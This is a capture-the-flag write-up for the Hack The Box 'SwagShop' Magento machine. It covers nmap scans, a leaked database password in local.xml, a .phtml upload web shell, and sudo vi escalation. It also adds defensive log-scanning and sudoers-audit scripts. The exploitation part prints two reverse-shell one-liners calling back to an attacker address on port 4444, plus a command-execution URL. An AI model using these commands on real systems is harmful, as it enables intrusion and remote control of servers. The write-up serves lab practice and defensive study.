
SwagShop

Link to the box: SwagShop

Enumeration (NMAP)

nmap -n -vvv -p- -T5 --min-rate 5000 10.10.10.140 -oN ports
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 22:04 EST
Initiating Ping Scan at 22:04
Scanning 10.10.10.140 [2 ports]
Completed Ping Scan at 22:04, 0.17s elapsed (1 total hosts)
Initiating Connect Scan at 22:04
Scanning 10.10.10.140 [65535 ports]
Discovered open port 80/tcp on 10.10.10.140
Discovered open port 22/tcp on 10.10.10.140
Warning: 10.10.10.140 giving up on port because retransmission cap hit (2).
Increasing send delay for 10.10.10.140 from 0 to 5 due to 239 out of 597 dropped probes since last increase.
Completed Connect Scan at 22:04, 29.15s elapsed (65535 total ports)
Nmap scan report for 10.10.10.140
Host is up, received conn-refused (0.16s latency).
Scanned at 2021-11-16 22:04:05 EST for 29s
Not shown: 39556 closed ports, 25977 filtered ports
Reason: 39556 conn-refused and 25977 no-responses
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 29.39 seconds
nmap -sC -sV -p22,80 10.10.10.140 -oN scan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 22:05 EST
Nmap scan report for 10.10.10.140
Host is up (0.17s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds
# Nmap 7.91 scan initiated Tue Nov 16 22:06:45 2021 as: nmap --script vuln -oN vulns 10.10.10.140
Nmap scan report for swagshop.htb (10.10.10.140)
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=swagshop.htb
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://swagshop.htb:80/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=48dnsh50a7k5br9n6c2vv7au40
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: login-form
|     Form action: http://swagshop.htb/index.php/customer/account/loginPost/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=afnf9a3d5ans7dq7cqokrdp703
|     
|     Path: http://swagshop.htb:80/index.php/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=ut0kd83am1ratf4qiju2a57rs3
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40contacts/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40contacts/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=rs4akd4co3qa2b5rn8qpb5u5m4
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: login-form
|     Form action: http://swagshop.htb/index.php/customer/account/loginPost/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=afnf9a3d5ans7dq7cqokrdp703
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40customer-service/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40customer-service/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=9l345cnlnci8klqa140kji6j11
|     
|     Path: http://swagshop.htb:80/index.php/hack-the-box-logo-t-shirt.html?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/hack-the-box-logo-t-shirt.html?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: product_addtocart_form
|     Form action: http://swagshop.htb/index.php/checkout/cart/add/uenc/aHR0cDovL3N3YWdzaG9wLmh0Yi9pbmRleC5waHAvaGFjay10aGUtYm94LWxvZ28tdC1zaGlydC5odG1sP1NJRD00OGRuc2g1MGE3azVicjluNmMydnY3YXU0MCZfX19TSUQ9VQ,,/product/1/form_key/iXyAOPHWUI3nuSy8/
|     
|     Path: http://swagshop.htb:80/index.php/hack-the-box-logo-t-shirt.html?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=48dnsh50a7k5br9n6c2vv7au40
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40about-magento-demo-store/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40about-magento-demo-store/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=dpbvakor0qpv7bjr39u9ig8b11
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: login-form
|     Form action: http://swagshop.htb/index.php/customer/account/loginPost/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=afnf9a3d5ans7dq7cqokrdp703
|     
|     Path: http://swagshop.htb:80/index.php/catalogsearch/advanced/?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/catalogsearch/advanced/?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: form-validate
|     Form action: http://swagshop.htb/index.php/catalogsearch/advanced/result/
|     
|     Path: http://swagshop.htb:80/index.php/catalogsearch/advanced/?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=48dnsh50a7k5br9n6c2vv7au40
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40privacy-policy-cookie-restriction-mode/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40privacy-policy-cookie-restriction-mode/
|     Form id: newsletter-validate-detail
|_    Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=k7fhmt188lptklt23d0n8oiu44
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /app/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /errors/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /includes/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /lib/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

# Nmap done at Tue Nov 16 22:12:41 2021 -- 1 IP address (1 host up) scanned in 355.85 seconds

Exploitation

The first thing we notice from the directory brute force (dirbuster) is the http://10.10.10.140/app/ folder. Inside it, http://10.10.10.140/app/etc/local.xml is readable and contains the MySQL credentials:

<username>root</username>
<password>fMVWh7bDHpgZkyfqQXreTjU9</password>


There is a utility for scanning Magento instances: https://github.com/steverobbins/magescan

The scan output gives us a version number that is actually exploitable.


sudo pip install mechanize 
python 37811 http://swagshop.htb/ "pwd"

But we need admin credentials for this.

Fortunately, there is an exploit that lets us create an admin user.


We can use the following blog post, which explains how to get RCE on Magento.

https://blog.scrt.ch/2019/01/24/magento-rce-local-file-read-with-low-privilege-admin-rights/

We go to our admin panel -> Catalog -> Manage Products -> Edit any product -> Add a new File -> Add .phtml in the file field -> Go to the product and upload the RCE with the .phtml extension. Now we should get RCE because the file is on the system.


http://swagshop.htb/media/custom_options/quote/e/m/76c52451d8a21467e209897a02e3dd83.phtml?cmd=whoami
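From the defender's side, the two web steps above (the readable app/etc/local.xml and a .phtml being served from the media tree) both leave clear traces in the Apache access log. The following Python script is an added example, not part of the original writeup and not tooling from the box or its author; it runs over constructed log lines modelled on that activity (the 192.0.2.7 shopper, the timestamps and the severity labels are all made up for the example) and flags what a log review should catch.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format; the constructed sample below follows it.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample traffic (not a real log from the box), modelled on the
# web-side steps in the writeup plus ordinary shopper traffic from 192.0.2.7.
SAMPLE_LOG = """\
10.10.14.31 - - [16/Nov/2021:22:04:10 -0500] "GET / HTTP/1.1" 302 512
10.10.14.31 - - [16/Nov/2021:22:06:50 -0500] "GET /app/ HTTP/1.1" 200 1344
10.10.14.31 - - [16/Nov/2021:22:07:02 -0500] "GET /app/etc/local.xml HTTP/1.1" 200 2810
10.10.14.31 - - [16/Nov/2021:22:30:11 -0500] "POST /index.php/admin/catalog_product/save/ HTTP/1.1" 302 0
10.10.14.31 - - [16/Nov/2021:22:31:40 -0500] "GET /media/custom_options/quote/e/m/76c52451d8a21467e209897a02e3dd83.phtml?cmd=whoami HTTP/1.1" 200 9
192.0.2.7 - - [16/Nov/2021:22:32:00 -0500] "GET /index.php/hack-the-box-logo-t-shirt.html HTTP/1.1" 200 18231
192.0.2.7 - - [16/Nov/2021:22:32:05 -0500] "GET /media/catalog/product/h/t/htb-shirt.jpg HTTP/1.1" 200 40211
"""

# Files a browser must never be able to fetch from a Magento 1 install.
SENSITIVE_PATHS = {"/app/etc/local.xml", "/app/etc/config.xml"}
# Directories nmap's http-enum reported as listable; a 200 on the bare path confirms it.
LISTABLE_DIRS = {"/app/", "/errors/", "/includes/", "/lib/"}
# Nothing executable should ever be served from the upload/media tree.
EXEC_EXT = (".phtml", ".php", ".phar")


def classify(line):
    """Return a list of (severity, reason) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    status = int(m.group("status"))
    url = urlsplit(m.group("path"))
    path = unquote(url.path)
    findings = []
    if path in SENSITIVE_PATHS and status == 200:
        findings.append(("critical", "config file served to client: " + path))
    if path in LISTABLE_DIRS and status == 200:
        findings.append(("medium", "directory listing reachable: " + path))
    if path.startswith("/media/") and path.lower().endswith(EXEC_EXT):
        # A 200 means the server ran it; a 404 is still a probe worth noting.
        severity = "critical" if status == 200 else "high"
        reason = "script requested from media tree: " + path
        if "cmd" in parse_qs(url.query):
            reason += " (cmd parameter present)"
        findings.append((severity, reason))
    return findings


def scan_log(text):
    """Group findings by client IP so the analyst sees one chain per source."""
    report = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for finding in classify(line):
            report[m.group("ip")].append(finding)
    return dict(report)


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG).items():
        print(ip)
        for severity, reason in findings:
            print(f"  [{severity}] {reason}")
```

Run against the sample, only 10.10.14.31 is reported, with the listing hit, the local.xml read and the .phtml execution in order; the shopper's product image under /media/ is ignored because it is not an executable extension. The same three conditions are also what a web server config should make impossible in the first place: deny app/etc/ to clients, turn off directory indexes, and refuse to hand .php/.phtml under media/ to the PHP handler.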


We can now run the reverse shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f

bash -c 'bash -i >& /dev/tcp/10.10.14.31/4444 0>&1'

Checking sudo, we notice that we can run vi as root on files in the /var/www/html folder, so we get root easily: sudo /usr/bin/vi /var/www/html/bash.sh
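The root step works because restricting an editor to a path does not restrict what the editor can do once it runs as root. As an added example (not from the writeup or the box), here is a small Python audit over a constructed sudoers-style sample; the www-data line is the shape implied by the sudo command above and the other rules are filler, so none of it is the box's real configuration.

```python
import os
import re

# Constructed sudoers-style sample (not the box's real file). The www-data line
# is the shape implied by "sudo /usr/bin/vi /var/www/html/bash.sh"; the rest is filler.
SAMPLE_SUDOERS = """\
# constructed sample for the audit below
root     ALL=(ALL:ALL) ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
www-data ALL=(ALL) NOPASSWD: /usr/bin/vi /var/www/html/*
deploy   ALL=(root) /usr/bin/systemctl restart apache2
"""

# Programs that give an interactive shell or arbitrary file writes once they run
# as root, so limiting the path they may be invoked on does not confine them.
SHELL_CAPABLE = {"vi", "vim", "view", "nano", "less", "more", "man",
                 "sh", "bash", "python", "python3", "perl"}

# user host=(runas) [TAG: ...] commands   (simplified; no aliases or Defaults lines)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def audit_rule(line):
    """Return the reasons one sudoers rule is risky ([] if it looks fine)."""
    line = line.split("#", 1)[0].strip()
    m = RULE_RE.match(line)
    if not m:
        return []
    user, runas, tags, cmds = (m.group(k) for k in ("user", "runas", "tags", "cmds"))
    if cmds.strip() == "ALL":
        return [] if user == "root" else ["unrestricted ALL for a non-root user"]
    target = "root" if runas in ("", "ALL", "ALL:ALL", "root") else runas
    reasons = []
    for spec in cmds.split(","):
        parts = spec.split()
        if not parts:
            continue
        prog, args = os.path.basename(parts[0]), parts[1:]
        if prog in SHELL_CAPABLE:
            reasons.append(f"{prog} runs as {target}; a path restriction does not confine it")
        if any("*" in a for a in args):
            reasons.append(f"wildcard argument for {prog}")
        if prog in SHELL_CAPABLE and "NOPASSWD:" in tags:
            reasons.append(f"no password needed for {prog}")
    return reasons


def audit_sudoers(text):
    """Map each user with a risky rule to the list of reasons."""
    findings = {}
    for line in text.splitlines():
        reasons = audit_rule(line)
        if reasons:
            findings.setdefault(line.split()[0], []).extend(reasons)
    return findings


if __name__ == "__main__":
    for user, reasons in audit_sudoers(SAMPLE_SUDOERS).items():
        print(user)
        for reason in reasons:
            print("  -", reason)
```

On the sample only the www-data rule is flagged, for three reasons at once: an editor, a wildcard path, and no password. The fix is not a tighter path; it is to stop granting an editor via sudo at all (for a web user, a dedicated deployment script with fixed arguments, or no sudo rule, is the usual answer).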


This post is licensed under CC BY 4.0 by the author.